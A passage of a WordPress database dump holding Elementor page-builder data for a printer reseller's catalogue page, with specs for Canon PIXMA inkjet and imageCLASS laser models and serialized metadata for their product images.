Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p><br \\/>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p><br \\/>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p><br \\/>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3837,2723,'_elementor_version','0.4'),(3840,2724,'_wp_attached_file','2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png'),(3841,2724,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:54:\"2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:54:\"74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:54:\"74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:52:\"74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3842,2725,'_wp_attached_file','2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png'),(3843,2725,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:54:\"2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"14e8362b0db44a5daaf2af034760fc58_MF269dw-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:54:\"14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:54:\"14e8362b0db44a5daaf2af034760fc58_MF269dw-1-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:52:\"14e8362b0db44a5daaf2af034760fc58_MF269dw-1-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3844,2726,'_wp_attached_file','2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png'),(3845,2726,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:54:\"2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"f8389aa599cc42db986e698ac364f9fc_MF266dn-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:54:\"f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:54:\"f8389aa599cc42db986e698ac364f9fc_MF266dn-1-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:52:\"f8389aa599cc42db986e698ac364f9fc_MF266dn-1-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3846,2727,'_wp_attached_file','2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png'),(3847,2727,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:53:\"2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"7583474b04984f42b18e94fe91075ec9_MF913w-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:53:\"7583474b04984f42b18e94fe91075ec9_MF913w-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:53:\"7583474b04984f42b18e94fe91075ec9_MF913w-1-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:51:\"7583474b04984f42b18e94fe91075ec9_MF913w-1-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3848,2728,'_wp_attached_file','2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png'),(3849,2728,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:320;s:4:\"file\";s:53:\"2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:53:\"e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:53:\"e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-362x300.png\";s:5:\"width\";i:362;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:51:\"e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3863,2733,'_wp_page_template','template-fullwidth.php'),(3864,2733,'_elementor_edit_mode','builder'),(3865,2733,'_elementor_template_type','post'),(3866,2733,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers 